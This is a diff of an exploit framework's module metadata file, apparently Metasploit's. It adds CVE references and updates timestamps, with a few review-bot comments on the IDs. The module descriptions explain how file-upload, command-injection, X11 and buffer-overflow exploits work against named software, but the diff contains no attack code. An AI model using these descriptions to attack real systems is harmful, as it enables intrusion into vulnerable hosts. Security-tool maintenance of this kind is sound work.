"path": "/modules/exploits/unix/webapp/wp_worktheflow_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_worktheflow_upload",
@@ -141691,6 +142884,7 @@
],
"description": "This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin\n from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote\n code execution. This module has been tested successfully on WordPress WPshop eCommerce\n 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.",
"references": [
"CVE-2015-10135",
"WPVDB-7830",
"URL-https://research.g0blin.co.uk/g0blin-00036/"
],
@@ -141715,7 +142909,7 @@
"targets": [
"WPshop eCommerce 1.3.9.5"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wpshop_ecommerce_file_upload",
@@ -141807,6 +143001,7 @@
],
"description": "The Wordpress plugin \"MailPoet Newsletters\" (wysija-newsletters) before 2.6.8\n is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme\n functionality to upload a zip file containing the payload. The plugin uses the\n admin_init hook, which is also executed for unauthenticated users when accessing\n a specific URL. The first fix for this vulnerability appeared in version 2.6.7,\n but the fix can be bypassed. In PHP's default configuration,\n a POST variable overwrites a GET variable in the $_REQUEST array. The plugin\n uses $_REQUEST to check for access rights. By setting the POST parameter to\n something not beginning with 'wysija_', the check is bypassed. Wordpress uses\n the $_GET array to determine the page, so it is not affected by this. The developers\n applied the fixes to all previous versions too.",
"references": [
"CVE-2014-4725",
"URL-http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html",
"URL-http://www.mailpoet.com/security-update-part-2/",
"URL-https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php",
@@ -141833,7 +143028,7 @@
"targets": [
"wysija-newsletters < 2.6.8"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wysija_newsletters_upload",
@@ -141867,6 +143062,7 @@
],
"description": "This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers\n can abuse the \"upload\" command in order to upload a malicious PHP file without any\n authentication, which results in arbitrary code execution. The module has been\n tested successfully on XODA 0.4.5 and Ubuntu 10.04.",
"references": [
"CVE-2012-10045",
"OSVDB-85117",
"BID-55127",
"EDB-20703"
@@ -141892,7 +143088,7 @@
"targets": [
"XODA 0.4.5"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/xoda_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/xoda_file_upload",
@@ -142287,6 +143483,7 @@
],
"description": "This module exploits a vulnerability found in ZPanel's htpasswd module. When\n creating .htaccess using the htpasswd module, the username field can be used to\n inject system commands, which is passed on to a system() function for executing\n the system's htpasswd command.\n\n Please note: In order to use this module, you must have a valid account to login\n to ZPanel. An account part of any of the default groups should suffice, such as:\n Administrators, Resellers, or Users (Clients). By default, there's already a\n 'zadmin' user, but the password is randomly generated.",
"references": [
"CVE-2013-10053",
"OSVDB-94038",
"URL-https://github.com/bobsta63/zpanelx/commit/fe9cec7a8164801e2b3755b7abeabdd607f97906",
"URL-http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2"
@@ -142312,7 +143509,7 @@
"targets": [
"ZPanel 10.0.0.2 on Linux"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/zpanel_username_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zpanel_username_exec",
@@ -142344,7 +143541,9 @@
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits open X11 servers by connecting and registering a\n virtual keyboard. The virtual keyboard is used to open an xterm or gnome\n terminal and type and execute the specified payload.",
"references": [],
"references": [
"CVE-1999-0526"
],
"platform": "Unix",
"arch": "cmd",
"rport": 6000,
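Review bot: CVE-1999-0526 is the only reference added in place of the previously empty list, for a module whose description targets an access-control condition (open X11 servers accepting a registered virtual keyboard) rather than a version-specific software flaw; worth confirming the identifier is the intended one for that open-access condition and, as the other entries in this file do, pairing it with an advisory or documentation URL if one exists.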
@@ -142354,7 +143553,7 @@
"xterm (Generic)",
"gnome-terminal (Ubuntu)"
],
"mod_time": "2025-05-04 16:24:31 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/x11/x11_keyboard_exec.rb",
"is_install_path": true,
"ref_name": "unix/x11/x11_keyboard_exec",
@@ -143892,6 +145091,7 @@
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"CVE-2006-6076",
"OSVDB-68330",
"URL-http://www.metasploit.com/users/mc"
],
@@ -143903,7 +145103,7 @@
"targets": [
"BrightStor ARCserve r11.5/Windows 2003"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/brightstor/tape_engine_0x8a.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/tape_engine_0x8a",
@@ -145422,6 +146622,7 @@
],
"description": "This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"CVE-2007-5755",
"OSVDB-54706",
"BID-35028",
"EDB-8733"
@@ -145434,7 +146635,7 @@
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/aol_ampx_convertfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/aol_ampx_convertfile",
@@ -146794,6 +147995,7 @@
],
"description": "This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n ActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly\n long string to the \"AddAttachments()\" method, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2010-20119",
"OSVDB-64839",
"EDB-12663"
],
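Review bot: CVE-2010-20119 is a retroactive assignment (a five-digit sequence number on a 2010-year ID) for a bug whose other references, OSVDB-64839 and EDB-12663, date from 2010; the same pattern recurs across the IDs added in this file. Confirm before merge that each added ID resolves in the CVE list, because a mistyped retro ID is still a syntactically valid string and the metadata build will accept it without complaint.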
@@ -146805,7 +148007,7 @@
"targets": [
"Windows XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/communicrypt_mail_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/communicrypt_mail_activex",
@@ -147350,6 +148552,7 @@
],
"description": "This module exploits a vulnerability in the Foxit Reader Plugin, it exists in\n the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,\n overly long query strings within URLs can cause a stack-based buffer overflow,\n which can be exploited to execute arbitrary code. This exploit has been tested\n on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281\n (npFoxitReaderPlugin.dll version 2.2.1.530).",
"references": [
"CVE-2013-10068",
"OSVDB-89030",
"BID-57174",
"EDB-23944",
@@ -147364,7 +148567,7 @@
"Automatic",
"Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/foxit_reader_plugin_url_bof",
@@ -147492,6 +148695,7 @@
],
"description": "This module exploits a stack-based buffer overflow in Green Dam Youth Escort\n version 3.17 in the way it handles overly long URLs.\n By setting an overly long URL, an attacker can overrun a buffer and execute\n arbitrary code. This module uses the .NET DLL memory technique by Alexander\n Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.",
"references": [
"CVE-2009-20008",
"OSVDB-55126",
"URL-http://web.archive.org/web/20110426190759/http://www.cse.umich.edu/~jhalderm/pub/gd/",
"EDB-8938",
@@ -147505,7 +148709,7 @@
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/greendam_url.rb",
"is_install_path": true,
"ref_name": "windows/browser/greendam_url",
@@ -149607,6 +150811,7 @@
],
"description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.",
"references": [
"CVE-2012-10032",
"OSVDB-88191",
"EDB-23225",
"URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html"
@@ -149619,7 +150824,7 @@
"targets": [
"Maxthon 3 (prior to 3.3) on Windows"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb",
"is_install_path": true,
"ref_name": "windows/browser/maxthon_history_xcs",
@@ -153682,6 +154887,7 @@
],
"description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.",
"references": [
"CVE-2011-10028",
"OSVDB-71559",
"EDB-17105"
],
@@ -153693,7 +154899,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb",
"is_install_path": true,
"ref_name": "windows/browser/real_arcade_installerdlg",
@@ -154565,6 +155771,7 @@
],
"description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.",
"references": [
"CVE-2013-10057",
"OSVDB-93754",
"EDB-25835"
],
@@ -154578,7 +155785,7 @@
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/synactis_connecttosynactis_bof",
@@ -154657,6 +155864,7 @@
],
"description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76",
"references": [
"CVE-2011-4034",
"OSVDB-74446",
"URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow"
],
@@ -154671,7 +155879,7 @@
"Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
"Windows 7 + JAVA + DEP bypass (IE8)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/teechart_pro.rb",
"is_install_path": true,
"ref_name": "windows/browser/teechart_pro",
@@ -155617,6 +156825,7 @@
],
"description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.",
"references": [
"CVE-2025-34128",
"EDB-35948",
"URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/"
],
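Review bot: the new reference CVE-2025-34128 carries a 2025 year while the module's other references (EDB-35948 and the 2015 rh0dev write-up) place the bug in 2015, so readers of the reference list may take this for a newly disclosed issue. If it is an intentional late assignment, note that in the PR description and check the ID against the CVE record before merge.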
@@ -155628,7 +156837,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/x360_video_player_set_text_bof",
@@ -156542,6 +157751,7 @@
],
"description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"CVE-2019-5618",
"OSVDB-67241",
"EDB-14676",
"EDB-14681"
@@ -156554,7 +157764,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
@@ -156588,6 +157798,7 @@
],
"description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2019-5621 ",
"OSVDB-75096",
"EDB-25204"
],
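Review bot: the added reference string "CVE-2019-5621 " has a trailing space, which will keep it from matching an exact lookup for "CVE-2019-5621" (for example a search on that CVE). The value here mirrors the module's own reference list, so trim it in the module at the listed path, /modules/exploits/windows/fileformat/abbs_amp_lst.rb, rather than in this file.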
@@ -156599,7 +157810,7 @@
"targets": [
"ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/abbs_amp_lst",
@@ -156725,6 +157936,7 @@
],
"description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.",
"references": [
"CVE-2012-10043",
"OSVDB-85175",
"EDB-20915",
"URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html"
@@ -156737,7 +157949,7 @@
"targets": [
"ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/actfax_import_users_bof",
@@ -156770,6 +157982,7 @@
],
"description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.",
"references": [
"CVE-2008-20001",
"OSVDB-64579",
"URL-http://www.activepdf.com/products/serverproducts/webgrabber/"
],
@@ -156781,7 +157994,7 @@
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/activepdf_webgrabber",
@@ -157689,6 +158902,7 @@
],
"description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results arbitrary code execution.",
"references": [
"CVE-2011-10027",
"OSVDB-70741",
"EDB-16085"
],
@@ -157702,7 +158916,7 @@
"AOL Desktop 9.6 on Windows XP SP3 - NX bypass",
"AOL Desktop 9.6 on Windows 7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aol_desktop_linktag",
@@ -157735,6 +158949,7 @@
],
"description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.",
"references": [
"CVE-2010-10015",
"OSVDB-61964",
"EDB-11204",
"URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/"
@@ -157747,7 +158962,7 @@
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aol_phobos_bof",
@@ -158067,6 +159282,7 @@
],
"description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.",
"references": [
"CVE-2009-0476",
"EDB-14961"
],
"platform": "Windows",
@@ -158077,7 +159293,7 @@
"targets": [
"Windows Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audiotran_pls_1424",
@@ -158111,6 +159327,7 @@
],
"description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result arbitrary code execution under\n the context of the user.",
"references": [
"CVE-2011-4496",
"OSVDB-77043",
"EDB-18096"
],
@@ -158122,7 +159339,7 @@
"targets": [
"Aviosoft DTV Player 1.0.1.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aviosoft_plf_buf",
@@ -158204,6 +159421,7 @@
],
"description": "This module exploits a stack-based buffer overflow in Beetel Connection\n Manager. The vulnerability exists in the parsing of the UserName\n parameter in the NetConfig.ini file.\n\n The module has been tested successfully against version\n PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-10036",
"OSVDB-98714",
"EDB-28969"
],
@@ -158215,7 +159433,7 @@
"targets": [
"PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -158249,6 +159467,7 @@
],
"description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.",
"references": [
"CVE-2012-10031",
"OSVDB-80896",
"EDB-18693",
"EDB-22931"
@@ -158261,7 +159480,7 @@
"targets": [
"BlazeVideo HDTV Player Pro v6.6.0.3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/blazedvd_hdtv_bof",
@@ -158437,6 +159656,7 @@
],
"description": "This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.",
"references": [
"CVE-2010-10016",
"OSVDB-82528",
"EDB-15934"
],
@@ -158449,7 +159669,7 @@
"Windows XP",
"Windows 7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bsplayer_m3u",
@@ -159008,6 +160228,7 @@
],
"description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.",
"references": [
"CVE-2011-10015",
"OSVDB-75991",
"BID-49924",
"URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt"
@@ -159020,7 +160241,7 @@
"targets": [
"Cytel Studio 9.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cytel_studio_cy3",
@@ -159150,6 +160371,7 @@
],
"description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2010-20111",
"OSVDB-68178",
"URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519",
"EDB-15134"
@@ -159162,7 +160384,7 @@
"targets": [
"Windows XP SP2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/digital_music_pad_pls",
@@ -159286,7 +160508,9 @@
"metacom27 <metacom27@gmail.com>"
],
"description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit\n this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.",
"references": [],
"references": [
"CVE-2020-7374"
],
"platform": "Windows",
"arch": "",
"rport": null,
@@ -159296,7 +160520,7 @@
"Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10",
"Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner",
@@ -159899,6 +161123,7 @@
],
"description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which required\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. Kind of lame but thats how it goes sometimes in\n the world of file write bugs.",
"references": [
"CVE-2011-10030",
"OSVDB-71104",
"URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html"
],
@@ -159912,7 +161137,7 @@
"Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
"Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_filewrite",
@@ -160046,6 +161271,7 @@
],
"description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.",
"references": [
"CVE-2010-20010",
"OSVDB-68648",
"EDB-15532",
"URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/"
@@ -160058,7 +161284,7 @@
"targets": [
"Foxit Reader v4.1.1 XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_title_bof",
@@ -160141,6 +161367,7 @@
],
"description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.",
"references": [
"CVE-2009-20004",
"OSVDB-60897",
"EDB-10339"
],
@@ -160152,7 +161379,7 @@
"targets": [
"Windows XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/galan_fileformat_bof",
@@ -160278,6 +161505,7 @@
],
"description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.",
"references": [
"CVE-2011-10014",
"OSVDB-83433",
"EDB-17893"
],
@@ -160289,7 +161517,7 @@
"targets": [
"GTA SA-MP (samp-server) v0.3.1.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/gta_samp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/gta_samp",
@@ -160466,6 +161694,7 @@
],
"description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.",
"references": [
"CVE-2025-34124",
"EDB-37716"
],
"platform": "Windows",
@@ -160478,7 +161707,7 @@
"HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
"Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/homm3_h3m",
@@ -160752,6 +161981,7 @@
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. This module has been\n tested successfully on Windows XP SP3.",
"references": [
"CVE-2014-125114",
"EDB-35177",
"OSVDB-114279"
],
@@ -160763,7 +161993,7 @@
"targets": [
"Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/iftp_schedule_bof",
@@ -160845,6 +162075,7 @@
],
"description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. It results in arbitrary code execution under the context of the user.",
"references": [
"CVE-2012-10057",
"OSVDB-82000",
"BID-53562",
"URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/"
@@ -160857,7 +162088,7 @@
"targets": [
"ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
